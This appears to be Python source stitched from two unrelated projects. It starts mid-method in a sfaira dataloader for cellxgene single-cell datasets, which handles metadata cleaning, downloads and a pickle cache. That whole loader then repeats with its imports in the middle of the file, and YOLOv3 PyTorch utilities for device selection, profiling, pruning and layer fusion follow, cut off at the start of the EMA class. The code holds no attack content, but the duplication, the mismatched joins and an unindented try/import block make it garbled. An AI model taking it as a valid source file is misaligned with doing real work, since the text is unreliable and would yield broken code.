        self._collection = None
        self.collection_id = collection_id
        self.supplier = "cellxgene"
        # First DOI-typed link of the collection, falling back to the collection id.
        doi = [x['link_url'] for x in self.collection["links"] if x['link_type'] == 'DOI']
        self.doi_journal = collection_id if len(doi) == 0 else doi[0]  # TODO access journal DOI explicitly.
        self.id = sample_fn
        # Set h5ad download URLs:
        download_url_data = []
        for asset in self._collection_dataset['dataset_assets']:
            if asset['filetype'].lower() == "h5ad":
                download_url_data.append(CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] +
                                         "/asset/" + asset['id'])
        self.download_url_data = download_url_data
        # Set dataset-wise attributes based on object preview from REST API (without h5ad download):
        # Set organism first so that other terms can access this attribute (e.g. developmental_stage ontology).
        reordered_keys = ["organism"] + [x for x in self._adata_ids_cellxgene.dataset_keys if x != "organism"]
        for k in reordered_keys:
            val = self._collection_dataset[getattr(self._adata_ids_cellxgene, k)]
            # Unique label if list is length 1:
            # Otherwise do not set property and resort to cell-wise labels.
            if isinstance(val, dict) or k == "sex":
                val = [val]
            v_clean = clean_cellxgene_meta_uns(k=k, val=val, adata_ids=self._adata_ids_cellxgene)
            try:
                # Set as single element or list if multiple entries are given.
                if len(v_clean) == 1:
                    setattr(self, k, v_clean[0])
                else:
                    setattr(self, k, v_clean)
            except ValueError as e:
                if verbose > 0:
                    print(f"WARNING: {e} in {self.collection_id} and data set {self.id}")
        # Swap in the versioned ID container once the organism is known.
        if self.organism == "human":
            self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
        elif self.organism == "mouse":
            self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
        else:
            # Was `assert False, self.organism`, which is silently stripped under `python -O`.
            raise ValueError(f"unsupported organism: {self.organism}")
        # Add author information. # TODO need to change this to contributor?
        setattr(self, "author", "cellxgene")
        # The h5ad objects from cellxgene follow a particular structure and the following attributes are guaranteed to
        # be in place. Note that these point at the anndata instance and will only be available for evaluation after
        # download. See below for attributes that are lazily available.
        self.cell_type_obs_key = self._adata_ids_cellxgene.cell_type
        self.development_stage_obs_key = self._adata_ids_cellxgene.development_stage
        self.disease_obs_key = self._adata_ids_cellxgene.disease
        self.ethnicity_obs_key = self._adata_ids_cellxgene.ethnicity
        self.sex_obs_key = self._adata_ids_cellxgene.sex
        # NOTE(review): this reads `.organism`, not `.organ` — looks like a copy-paste
        # slip; confirm the intended attribute before changing behavior.
        self.organ_obs_key = self._adata_ids_cellxgene.organism
        self.state_exact_obs_key = self._adata_ids_cellxgene.state_exact
        self.gene_id_symbols_var_key = self._adata_ids_cellxgene.feature_symbol
        self._unknown_celltype_identifiers = self._adata_ids_cellxgene.unknown_metadata_identifier

    @property
    def _collection_cache_dir(self):
        """
        The cache dir is in a cache directory in the sfaira installation that is exempt from git versioning.
        """
        # mkdir is idempotent: ensure the directory exists before handing the path out.
        cache_dir_path = pathlib.Path(CACHE_DIR_DATABASES_CELLXGENE)
        cache_dir_path.mkdir(parents=True, exist_ok=True)
        return CACHE_DIR_DATABASES_CELLXGENE

    @property
    def _collection_cache_fn(self):
        # Pickle cache file of the REST API response for this collection.
        return os.path.join(self._collection_cache_dir, self.collection_id + ".pickle")

    @property
    def collection(self):
        # Lazily loaded collection meta data, cached on disk across sessions.
        if self._collection is None:
            # Check if cached:
            if os.path.exists(self._collection_cache_fn):
                with open(self._collection_cache_fn, "rb") as f:
                    self._collection = pickle.load(f)
            else:
                # Download and cache:
                self._collection = get_collection(collection_id=self.collection_id)
                with open(self._collection_cache_fn, "wb") as f:
                    pickle.dump(obj=self._collection, file=f)
        return self._collection

    @property
    def _collection_dataset(self):
        # Meta data entry of this particular data set within the collection.
        return self.collection['datasets'][self._sample_fns.index(self.sample_fn)]

    @property
    def directory_formatted_doi(self) -> str:
        # Data sets of this loader are grouped by collection rather than DOI.
        return self.collection_id

    @property
    def doi_cleaned_id(self):
        return self.id

    def load(
            self,
            remove_gene_version: bool = True,
            match_to_reference: Union[str, bool, None] = None,
            load_raw: bool = False,
            allow_caching: bool = True,
            set_metadata: bool = True,
            **kwargs
    ):
        # Invoke load with cellxgene adapted parameters:
        # - Never cache as the cellxgene objects are already fast to read.
        super().load(
            remove_gene_version=False,
            match_to_reference=match_to_reference,
            load_raw=True,
            allow_caching=False,
            set_metadata=set_metadata,
            adata_ids=self._adata_ids_cellxgene,
            **kwargs
        )

    def download(self, filetype: str = "h5ad", verbose: int = 0):
        """
        Only download if file does not already exist.

        :param filetype: File type to download.

            - "h5ad"
            - "rds"
            - "loom"
        :param verbose: Report download progress if > 0.
        """
        counter = 0
        if not os.path.exists(os.path.join(self.data_dir_base, self.directory_formatted_doi)):
            os.makedirs(os.path.join(self.data_dir_base, self.directory_formatted_doi))
        for asset in self._collection_dataset['dataset_assets']:
            if asset['filetype'].lower() == filetype:
                # Only download if file does not already exist:
                fn = cellxgene_fn(dir=self.data_dir, dataset_id=self.sample_fn)
                if not os.path.isfile(fn):
                    counter += 1
                    assert counter < 2, f"found more than one {filetype} for data set {self.sample_fn}"
                    url = CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] + "/asset/" + \
                        asset['id']
                    r = requests.post(url)
                    r.raise_for_status()
                    presigned_url = r.json()['presigned_url']
                    # Report: probe the first byte only to obtain size/server headers.
                    headers = {'range': 'bytes=0-0'}
                    r1 = requests.get(presigned_url, headers=headers)
                    if r1.status_code == requests.codes.partial:
                        if verbose > 0:
                            # Fixed quoting: reusing double quotes inside an f-string
                            # is a SyntaxError before Python 3.12.
                            print(f"Downloading {r1.headers['Content-Range']} from {r1.headers['Server']}")
                    # Download (context manager closes the file handle deterministically):
                    with open(fn, 'wb') as f_out:
                        f_out.write(get_data(presigned_url=presigned_url))

    def show_summary(self):
        # Render the data set meta data as an interactive JSON tree in a notebook.
        uuid_session = str(uuid.uuid4())
        display_html('<div id="{}" style="height: 600px; width:100%;"></div>'.format(uuid_session), raw=True)
        display_javascript("""
        require(["https://rawgit.com/caldwell/renderjson/master/renderjson.js"], function() {
          document.getElementById('%s').appendChild(renderjson(%s))
        });
        """ % (uuid_session, json.dumps(self._collection_dataset)), raw=True)
def load(data_dir, sample_fn, adata_ids: AdataIdsCellxgene, **kwargs):
    """
    Generalised load function for cellxgene-provided data sets.

    This function corresponds to the dataset-wise load() functions defined in standard sfaira data loaders.
    """
    adata = anndata.read_h5ad(cellxgene_fn(dir=data_dir, dataset_id=sample_fn))
    if adata.raw is not None:  # TODO still need this?
        # Replace the processed matrix by the raw counts and drop .raw.
        adata.X = adata.raw.X
        del adata.raw
    # Clean ontology-constrained .obs columns in place:
    for key in adata_ids.ontology_constrained:
        col = getattr(adata_ids, key)
        if col in adata.obs.columns:
            adata.obs[col] = clean_cellxgene_meta_obs(k=key, val=adata.obs[col].values, adata_ids=adata_ids)
    return adata
import anndata
from IPython.display import display_javascript, display_html
import json
import os
import pathlib
import pickle
import requests
from typing import List, Union
import uuid
from sfaira.data.dataloaders.base import DatasetBase
from sfaira.consts import AdataIdsCellxgene, AdataIdsCellxgene_v2_0_0
from sfaira.consts.directories import CACHE_DIR_DATABASES_CELLXGENE
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import get_collection, get_data
from sfaira.data.dataloaders.databases.cellxgene.rest_helpers import CELLXGENE_PRODUCTION_ENDPOINT, DOWNLOAD_DATASET
def cellxgene_fn(dir, dataset_id):
    """Return the path of the local h5ad copy of data set ``dataset_id`` under ``dir``."""
    fn = dataset_id + ".h5ad"
    return os.path.join(dir, fn)
def clean_cellxgene_meta_obs(k, val, adata_ids) -> Union[str, List[str]]:
    """
    Normalise one cell-wise (.obs) meta data column downloaded from cellxgene.

    :param k: Found meta data name.
    :param val: Found meta data entries (one per cell).
    :param adata_ids: Cellxgene ID container (unused here, kept for API symmetry).
    :returns: Cleaned meta data entries.
    """
    if k == "disease":
        # TODO normal state label varies in disease annotation. This can be removed once streamlined.
        return ["healthy" if v.lower() in ("normal", "healthy") else v for v in val]
    if k == "organ":
        # Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
        return [v.split(" ")[0] for v in val]
    if k == "organism":
        # TODO deprecate map once same organism naming is used.
        name_map = {
            "Homo sapiens": "human",
            "Mus musculus": "mouse",
        }
        return [name_map.get(v, v) for v in val]
    return val
def clean_cellxgene_meta_uns(k, val, adata_ids) -> Union[str, List[str]]:
    """
    Normalise one dataset-wise (.uns) meta data entry downloaded from cellxgene.

    :param k: Found meta data name.
    :param val: Found meta data entries; "sex" entries are sequences, the rest are
        {"label": ..., "ontology_term_id": ...} dictionaries.
    :param adata_ids: Cellxgene ID container defining unknown / invalid identifiers.
    :returns: Cleaned meta data entries, with unknown / invalid values dropped.
    """
    cleaned = []
    for entry in val:
        if k == "sex":
            item = entry[0]
        else:
            # Decide if labels are read from name or ontology ID:
            if k == "disease" and entry["label"].lower() in ("normal", "healthy"):
                # TODO normal state label varies in disease annotation. This can be removed once streamlined.
                item = "healthy"
            elif k in ("assay_sc", "disease", "organ") and \
                    entry["ontology_term_id"] != adata_ids.unknown_metadata_identifier:
                item = entry["ontology_term_id"]
            else:
                item = entry["label"]
            # Organ labels contain labels on tissue type also, such as 'UBERON:0001911 (cell culture)'.
            if k == "organ":
                item = item.split(" ")[0]
            if k == "organism":
                # TODO deprecate map once same organism naming is used.
                item = {"Homo sapiens": "human", "Mus musculus": "mouse"}.get(item, item)
        if item not in (adata_ids.unknown_metadata_identifier, adata_ids.invalid_metadata_identifier):
            cleaned.append(item)
    return cleaned
class Dataset(DatasetBase):
    """
    This is a dataloader for downloaded h5ad from cellxgene.

    In contrast to the base class, each instance is coupled to a particular collection_id to allow query.
    In the base classes, collection_id are only defined on the group level.
    """

    collection_id: str

    def __init__(
            self,
            collection_id: str = "default",
            data_path: Union[str, None] = None,
            meta_path: Union[str, None] = None,
            cache_path: Union[str, None] = None,
            load_func=None,
            dict_load_func_annotation=None,
            yaml_path: Union[str, None] = None,
            sample_fn: Union[str, None] = None,
            sample_fns: Union[List[str], None] = None,
            additional_annotation_key: Union[str, None] = None,
            verbose: int = 0,
            **kwargs
    ):
        super().__init__(
            data_path=data_path,
            meta_path=meta_path,
            cache_path=cache_path,
            load_func=load_func,
            sample_fn=sample_fn,
            sample_fns=sample_fns,
        )
        # General keys are defined in the shared IDs object. Further down, the species specific one is loaded to
        # disambiguate species-dependent differences.
        self._adata_ids_cellxgene = AdataIdsCellxgene()
        self._collection = None
        self.collection_id = collection_id
        self.supplier = "cellxgene"
        # First DOI-typed link of the collection, falling back to the collection id.
        doi = [x['link_url'] for x in self.collection["links"] if x['link_type'] == 'DOI']
        self.doi_journal = collection_id if len(doi) == 0 else doi[0]  # TODO access journal DOI explicitly.
        self.id = sample_fn
        # Set h5ad download URLs:
        download_url_data = []
        for asset in self._collection_dataset['dataset_assets']:
            if asset['filetype'].lower() == "h5ad":
                download_url_data.append(CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] +
                                         "/asset/" + asset['id'])
        self.download_url_data = download_url_data
        # Set dataset-wise attributes based on object preview from REST API (without h5ad download):
        # Set organism first so that other terms can access this attribute (e.g. developmental_stage ontology).
        reordered_keys = ["organism"] + [x for x in self._adata_ids_cellxgene.dataset_keys if x != "organism"]
        for k in reordered_keys:
            val = self._collection_dataset[getattr(self._adata_ids_cellxgene, k)]
            # Unique label if list is length 1:
            # Otherwise do not set property and resort to cell-wise labels.
            if isinstance(val, dict) or k == "sex":
                val = [val]
            v_clean = clean_cellxgene_meta_uns(k=k, val=val, adata_ids=self._adata_ids_cellxgene)
            try:
                # Set as single element or list if multiple entries are given.
                if len(v_clean) == 1:
                    setattr(self, k, v_clean[0])
                else:
                    setattr(self, k, v_clean)
            except ValueError as e:
                if verbose > 0:
                    print(f"WARNING: {e} in {self.collection_id} and data set {self.id}")
        # Swap in the versioned ID container once the organism is known.
        if self.organism == "human":
            self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
        elif self.organism == "mouse":
            self._adata_ids_cellxgene = AdataIdsCellxgene_v2_0_0()
        else:
            # Was `assert False, self.organism`, which is silently stripped under `python -O`.
            raise ValueError(f"unsupported organism: {self.organism}")
        # Add author information. # TODO need to change this to contributor?
        setattr(self, "author", "cellxgene")
        # The h5ad objects from cellxgene follow a particular structure and the following attributes are guaranteed to
        # be in place. Note that these point at the anndata instance and will only be available for evaluation after
        # download. See below for attributes that are lazily available.
        self.cell_type_obs_key = self._adata_ids_cellxgene.cell_type
        self.development_stage_obs_key = self._adata_ids_cellxgene.development_stage
        self.disease_obs_key = self._adata_ids_cellxgene.disease
        self.ethnicity_obs_key = self._adata_ids_cellxgene.ethnicity
        self.sex_obs_key = self._adata_ids_cellxgene.sex
        # NOTE(review): this reads `.organism`, not `.organ` — looks like a copy-paste
        # slip; confirm the intended attribute before changing behavior.
        self.organ_obs_key = self._adata_ids_cellxgene.organism
        self.state_exact_obs_key = self._adata_ids_cellxgene.state_exact
        self.gene_id_symbols_var_key = self._adata_ids_cellxgene.feature_symbol
        self._unknown_celltype_identifiers = self._adata_ids_cellxgene.unknown_metadata_identifier

    @property
    def _collection_cache_dir(self):
        """
        The cache dir is in a cache directory in the sfaira installation that is exempt from git versioning.
        """
        # mkdir is idempotent: ensure the directory exists before handing the path out.
        cache_dir_path = pathlib.Path(CACHE_DIR_DATABASES_CELLXGENE)
        cache_dir_path.mkdir(parents=True, exist_ok=True)
        return CACHE_DIR_DATABASES_CELLXGENE

    @property
    def _collection_cache_fn(self):
        # Pickle cache file of the REST API response for this collection.
        return os.path.join(self._collection_cache_dir, self.collection_id + ".pickle")

    @property
    def collection(self):
        # Lazily loaded collection meta data, cached on disk across sessions.
        if self._collection is None:
            # Check if cached:
            if os.path.exists(self._collection_cache_fn):
                with open(self._collection_cache_fn, "rb") as f:
                    self._collection = pickle.load(f)
            else:
                # Download and cache:
                self._collection = get_collection(collection_id=self.collection_id)
                with open(self._collection_cache_fn, "wb") as f:
                    pickle.dump(obj=self._collection, file=f)
        return self._collection

    @property
    def _collection_dataset(self):
        # Meta data entry of this particular data set within the collection.
        return self.collection['datasets'][self._sample_fns.index(self.sample_fn)]

    @property
    def directory_formatted_doi(self) -> str:
        # Data sets of this loader are grouped by collection rather than DOI.
        return self.collection_id

    @property
    def doi_cleaned_id(self):
        return self.id

    def load(
            self,
            remove_gene_version: bool = True,
            match_to_reference: Union[str, bool, None] = None,
            load_raw: bool = False,
            allow_caching: bool = True,
            set_metadata: bool = True,
            **kwargs
    ):
        # Invoke load with cellxgene adapted parameters:
        # - Never cache as the cellxgene objects are already fast to read.
        super().load(
            remove_gene_version=False,
            match_to_reference=match_to_reference,
            load_raw=True,
            allow_caching=False,
            set_metadata=set_metadata,
            adata_ids=self._adata_ids_cellxgene,
            **kwargs
        )

    def download(self, filetype: str = "h5ad", verbose: int = 0):
        """
        Only download if file does not already exist.

        :param filetype: File type to download.

            - "h5ad"
            - "rds"
            - "loom"
        :param verbose: Report download progress if > 0.
        """
        counter = 0
        if not os.path.exists(os.path.join(self.data_dir_base, self.directory_formatted_doi)):
            os.makedirs(os.path.join(self.data_dir_base, self.directory_formatted_doi))
        for asset in self._collection_dataset['dataset_assets']:
            if asset['filetype'].lower() == filetype:
                # Only download if file does not already exist:
                fn = cellxgene_fn(dir=self.data_dir, dataset_id=self.sample_fn)
                if not os.path.isfile(fn):
                    counter += 1
                    assert counter < 2, f"found more than one {filetype} for data set {self.sample_fn}"
                    url = CELLXGENE_PRODUCTION_ENDPOINT + DOWNLOAD_DATASET + asset['dataset_id'] + "/asset/" + \
                        asset['id']
                    r = requests.post(url)
                    r.raise_for_status()
                    presigned_url = r.json()['presigned_url']
                    # Report: probe the first byte only to obtain size/server headers.
                    headers = {'range': 'bytes=0-0'}
                    r1 = requests.get(presigned_url, headers=headers)
                    if r1.status_code == requests.codes.partial:
                        if verbose > 0:
                            print(f"Downloading {r1.headers['Content-Range']} from {r1.headers['Server']}")
                    # Download (context manager closes the file handle deterministically):
                    with open(fn, 'wb') as f_out:
                        f_out.write(get_data(presigned_url=presigned_url))

    def show_summary(self):
        # Render the data set meta data as an interactive JSON tree in a notebook.
        uuid_session = str(uuid.uuid4())
        display_html('<div id="{}" style="height: 600px; width:100%;"></div>'.format(uuid_session), raw=True)
        display_javascript("""
        require(["https://rawgit.com/caldwell/renderjson/master/renderjson.js"], function() {
          document.getElementById('%s').appendChild(renderjson(%s))
        });
        """ % (uuid_session, json.dumps(self._collection_dataset)), raw=True)
def load(data_dir, sample_fn, adata_ids: AdataIdsCellxgene, **kwargs):
    """
    Generalised load function for cellxgene-provided data sets.

    This function corresponds to the dataset-wise load() functions defined in standard sfaira data loaders.
    """
    adata = anndata.read_h5ad(cellxgene_fn(dir=data_dir, dataset_id=sample_fn))
    if adata.raw is not None:  # TODO still need this?
        # Replace the processed matrix by the raw counts and drop .raw.
        adata.X = adata.raw.X
        del adata.raw
    # Clean ontology-constrained .obs columns in place:
    for key in adata_ids.ontology_constrained:
        col = getattr(adata_ids, key)
        if col in adata.obs.columns:
            adata.obs[col] = clean_cellxgene_meta_obs(k=key, val=adata.obs[col].values, adata_ids=adata_ids)
    return adata
# YOLOv3 PyTorch utils
import datetime
import logging
import math
import os
import platform
import subprocess
import time
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torchvision
try:
import thop # for FLOPS computation
except ImportError:
thop = None
logger = logging.getLogger(__name__)
@contextmanager
def torch_distributed_zero_first(local_rank: int):
    """
    Decorator to make all processes in distributed training wait for each local_master to do something.
    """
    is_worker = local_rank not in (-1, 0)
    if is_worker:
        # Non-master ranks wait here until the local master has finished.
        torch.distributed.barrier()
    yield
    if local_rank == 0:
        # The local master releases the waiting ranks once its work is done.
        torch.distributed.barrier()
def init_torch_seeds(seed=0):
    # Speed-reproducibility tradeoff https://pytorch.org/docs/stable/notes/randomness.html
    torch.manual_seed(seed)
    # seed == 0: slower but more reproducible; any other seed: faster, less reproducible.
    reproducible = seed == 0
    cudnn.benchmark = not reproducible
    cudnn.deterministic = reproducible
def date_modified(path=__file__):
    """Return a human-readable file modification date, e.g. '2021-3-26'."""
    mtime = Path(path).stat().st_mtime
    t = datetime.datetime.fromtimestamp(mtime)
    return '-'.join(str(part) for part in (t.year, t.month, t.day))
def git_describe(path=Path(__file__).parent):  # path must be a directory
    """Return a human-readable git description, e.g. v5.0-5-g3e25f1e
    (https://git-scm.com/docs/git-describe), or '' outside a git repository."""
    # NOTE: shell=True with an interpolated path; path comes from __file__ here.
    cmd = f'git -C {path} describe --tags --long --always'
    try:
        out = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
        return out.decode()[:-1]  # strip trailing newline
    except subprocess.CalledProcessError:
        return ''  # not a git repository
def select_device(device='', batch_size=None):
    """Select the torch device and log a summary line.

    Args:
        device: 'cpu', 'dml', '0' or '0,1,2,3'; '' picks CUDA when available.
        batch_size: Optional total batch size, validated to be divisible by the GPU count.
    Returns:
        torch.device: The selected device ('dml', 'cuda:0' or 'cpu').
    """
    if device.lower() == 'dml':
        # DirectML backend: bypass the CUDA/CPU selection logic entirely.
        return torch.device('dml')
    s = f'YOLOv3 🚀 {git_describe() or date_modified()} torch {torch.__version__} '  # string
    cpu = device.lower() == 'cpu'
    if cpu:
        os.environ['CUDA_VISIBLE_DEVICES'] = '-1'  # force torch.cuda.is_available() = False
    elif device:  # non-cpu device requested
        # os.environ['CUDA_VISIBLE_DEVICES'] = device  # set environment variable
        assert torch.cuda.is_available(), f'CUDA unavailable, invalid device {device} requested'  # check availability
    cuda = not cpu and torch.cuda.is_available()
    if cuda:
        devices = device.split(',') if device else range(torch.cuda.device_count())  # i.e. 0,1,6,7
        n = len(devices)  # device count
        if n > 1 and batch_size:  # check batch_size is divisible by device_count
            assert batch_size % n == 0, f'batch-size {batch_size} not multiple of GPU count {n}'
        space = ' ' * len(s)
        for i, d in enumerate(devices):
            p = torch.cuda.get_device_properties(i)
            # Fixed quoting: reusing double quotes inside an f-string is a
            # SyntaxError before Python 3.12.
            prefix = '' if i == 0 else space
            s += f"{prefix}CUDA:{d} ({p.name}, {p.total_memory / 1024 ** 2}MB)\n"  # bytes to MB
    else:
        s += 'CPU\n'
    logger.info(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s)  # emoji-safe
    return torch.device('cuda:0' if cuda else 'cpu')
def time_synchronized():
    """Return time.time() after synchronizing CUDA (if available), for accurate timing."""
    cuda_ready = torch.cuda.is_available()
    if cuda_ready:
        torch.cuda.synchronize()
    return time.time()
def profile(x, ops, n=100, device=None):
    """Profile speed and FLOPS of a pytorch module or list of modules.

    Example usage:
        x = torch.randn(16, 3, 640, 640)  # input
        m1 = lambda x: x * torch.sigmoid(x)
        m2 = nn.SiLU()
        profile(x, [m1, m2], n=100)  # profile speed over 100 iterations

    Args:
        x: Input tensor; moved to `device` with requires_grad enabled.
        ops: A module/callable or a list of them.
        n: Number of timing iterations.
        device: Target device; defaults to cuda:0 when available, else cpu.
    """
    device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
    x = x.to(device)
    x.requires_grad = True
    print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
    # Fixed quoting: reusing double quotes inside an f-string is a SyntaxError
    # before Python 3.12.
    print(f"\n{'Params':>12s}{'GFLOPS':>12s}{'forward (ms)':>16s}{'backward (ms)':>16s}{'input':>24s}{'output':>24s}")
    for m in ops if isinstance(ops, list) else [ops]:
        m = m.to(device) if hasattr(m, 'to') else m  # device
        m = m.half() if hasattr(m, 'half') and isinstance(x, torch.Tensor) and x.dtype is torch.float16 else m  # type
        dtf, dtb, t = 0., 0., [0., 0., 0.]  # dt forward, backward
        try:
            flops = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2  # GFLOPS
        except Exception:  # was a bare except: thop may be missing or unsupported for m
            flops = 0
        for _ in range(n):
            t[0] = time_synchronized()
            y = m(x)
            t[1] = time_synchronized()
            try:
                _ = y.sum().backward()
                t[2] = time_synchronized()
            except Exception:  # no backward method (was a bare except)
                t[2] = float('nan')
            dtf += (t[1] - t[0]) * 1000 / n  # ms per op forward
            dtb += (t[2] - t[1]) * 1000 / n  # ms per op backward
        s_in = tuple(x.shape) if isinstance(x, torch.Tensor) else 'list'
        s_out = tuple(y.shape) if isinstance(y, torch.Tensor) else 'list'
        p = sum(x.numel() for x in m.parameters()) if isinstance(m, nn.Module) else 0  # parameters
        print(f'{p:12}{flops:12.4g}{dtf:16.4g}{dtb:16.4g}{str(s_in):>24s}{str(s_out):>24s}')
def is_parallel(model):
    """True when `model` is wrapped in nn.DataParallel or nn.DistributedDataParallel."""
    parallel_types = (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
    return type(model) in parallel_types
def de_parallel(model):
    """Unwrap a DP/DDP-wrapped model; return the bare module, or `model` unchanged."""
    if type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel):
        return model.module
    return model
def intersect_dicts(da, db, exclude=()):
    """Entries of `da` whose key is also in `db` with an equal `.shape`, skipping keys containing any `exclude` substring."""
    out = {}
    for key, value in da.items():
        if any(pattern in key for pattern in exclude):
            continue
        if key in db and value.shape == db[key].shape:
            out[key] = value  # da's value wins
    return out
def initialize_weights(model):
    """Apply defaults to every submodule: BatchNorm eps/momentum tweaks, in-place activations."""
    activations = (nn.Hardswish, nn.LeakyReLU, nn.ReLU, nn.ReLU6)
    for module in model.modules():
        kind = type(module)  # exact-type dispatch (subclasses intentionally not matched)
        if kind is nn.Conv2d:
            # conv weight init left at PyTorch defaults
            # (nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu'))
            continue
        if kind is nn.BatchNorm2d:
            module.eps = 1e-3
            module.momentum = 0.03
        elif kind in activations:
            module.inplace = True
def find_modules(model, mclass=nn.Conv2d):
    """Return indices into model.module_list whose entries are instances of `mclass`."""
    indices = []
    for idx, layer in enumerate(model.module_list):
        if isinstance(layer, mclass):
            indices.append(idx)
    return indices
def sparsity(model):
    """Global sparsity: fraction of parameter entries that are exactly zero (0-d tensor)."""
    total = 0.
    zeros = 0.
    for param in model.parameters():
        total += param.numel()
        zeros += (param == 0).sum()
    return zeros / total
def prune(model, amount=0.3):
    """L1-unstructured prune every Conv2d weight to `amount` sparsity, then make it permanent."""
    import torch.nn.utils.prune as prune_utils
    print('Pruning model... ', end='')
    for _, module in model.named_modules():
        if isinstance(module, nn.Conv2d):
            prune_utils.l1_unstructured(module, name='weight', amount=amount)  # zero smallest-magnitude weights
            prune_utils.remove(module, 'weight')  # drop re-param hooks, keep the zeros
    print(' %.3g global sparsity' % sparsity(model))
def fuse_conv_and_bn(conv, bn):
    # Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/
    # Inference-time fusion: returns a single Conv2d (bias on, gradients off) equivalent
    # to conv followed by bn:
    #   W_fused = diag(gamma / sqrt(var + eps)) @ W_conv
    #   b_fused = (b_conv - mean) * gamma / sqrt(var + eps) + beta
    fusedconv = nn.Conv2d(conv.in_channels,
                          conv.out_channels,
                          kernel_size=conv.kernel_size,
                          stride=conv.stride,
                          padding=conv.padding,
                          groups=conv.groups,
                          bias=True).requires_grad_(False).to(conv.weight.device)
    # prepare filters
    w_conv = conv.weight.clone().view(conv.out_channels, -1)  # each output filter flattened to a row
    w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))  # per-channel BN scale on the diagonal
    fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
    # prepare spatial bias
    b_conv = torch.zeros(conv.weight.size(0), device=conv.weight.device) if conv.bias is None else conv.bias
    b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(torch.sqrt(bn.running_var + bn.eps))
    fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
    return fusedconv
def model_info(model, verbose=False, img_size=640):
    """Log a model summary: layer/parameter/gradient counts, plus GFLOPS when thop is available.

    img_size may be an int or a [h, w] list, i.e. img_size=640 or img_size=[640, 320].
    With verbose=True also prints a per-parameter table.
    """
    n_p = sum(x.numel() for x in model.parameters())  # number of parameters
    n_g = sum(x.numel() for x in model.parameters() if x.requires_grad)  # number of gradients
    if verbose:
        print('%5s %40s %9s %12s %20s %10s %10s' % ('layer', 'name', 'gradient', 'parameters', 'shape', 'mu', 'sigma'))
        for i, (name, p) in enumerate(model.named_parameters()):
            name = name.replace('module_list.', '')
            print('%5g %40s %9s %12g %20s %10.3g %10.3g' %
                  (i, name, p.requires_grad, p.numel(), list(p.shape), p.mean(), p.std()))
    try:  # FLOPS
        from thop import profile
        stride = max(int(model.stride.max()), 32) if hasattr(model, 'stride') else 32
        img = torch.zeros((1, model.yaml.get('ch', 3), stride, stride), device=next(model.parameters()).device)  # input
        flops = profile(deepcopy(model), inputs=(img,), verbose=False)[0] / 1E9 * 2  # stride GFLOPS
        img_size = img_size if isinstance(img_size, list) else [img_size, img_size]  # expand if int/float
        fs = ', %.1f GFLOPS' % (flops * img_size[0] / stride * img_size[1] / stride)  # scaled to img_size
    except Exception:  # was `except (ImportError, Exception)` — Exception already subsumes ImportError
        fs = ''
    logger.info(f"Model Summary: {len(list(model.modules()))} layers, {n_p} parameters, {n_g} gradients{fs}")
def load_classifier(name='resnet101', n=2):
    """Download a pretrained torchvision classifier and reshape its final FC layer to `n` classes."""
    model = torchvision.models.__dict__[name](pretrained=True)
    # torchvision ResNet preprocessing reference:
    #   input_size = [3, 224, 224], input_space = 'RGB', input_range = [0, 1]
    #   mean = [0.485, 0.456, 0.406], std = [0.229, 0.224, 0.225]
    # Replace the classification head with a zero-initialized n-way layer
    in_features = model.fc.weight.shape[1]
    model.fc.bias = nn.Parameter(torch.zeros(n), requires_grad=True)
    model.fc.weight = nn.Parameter(torch.zeros(n, in_features), requires_grad=True)
    model.fc.out_features = n
    return model
def scale_img(img, ratio=1.0, same_shape=False, gs=32):  # img(16,3,256,416)
    """Scale a (bs, 3, h, w) batch by `ratio`; unless same_shape, pad/crop so dims are gs-multiples."""
    if ratio == 1.0:
        return img
    h, w = img.shape[2:]
    new_size = (int(h * ratio), int(w * ratio))
    img = F.interpolate(img, size=new_size, mode='bilinear', align_corners=False)  # resize
    if not same_shape:  # round target dims up to the nearest grid-size multiple
        h, w = (math.ceil(dim * ratio / gs) * gs for dim in (h, w))
    return F.pad(img, [0, w - new_size[1], 0, h - new_size[0]], value=0.447)  # 0.447 = ImageNet mean
def copy_attr(a, b, include=(), exclude=()):
    """Copy b's instance attributes onto a; restrict to `include` (when non-empty), drop `exclude` and _private names."""
    for name, value in b.__dict__.items():
        wanted = not include or name in include
        if wanted and not name.startswith('_') and name not in exclude:
            setattr(a, name, value)
class ModelEMA:
    """ Model Exponential Moving Average from https://github.com/rwightman/pytorch-image-models
    Keep a moving average of everything in the model state_dict (parameters and buffers).
    This is intended to allow functionality like
    https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
    A smoothed version of the weights is necessary for some training schemes to perform well.
    This class is sensitive where it is initialized in the sequence of model init,
    GPU assignment and distributed training wrappers.
    """
    def __init__(self, model, decay=0.9999, updates=0):
        # Create EMA: a frozen, eval-mode deepcopy of the (DP/DDP-unwrapped) model
        self.ema = deepcopy(model.module if is_parallel(model) else model).eval()  # FP32 EMA
        # if next(model.parameters()).device.type != 'cpu':
        #     self.ema.half()  # FP16 EMA
        self.updates = updates  # number of EMA updates performed so far
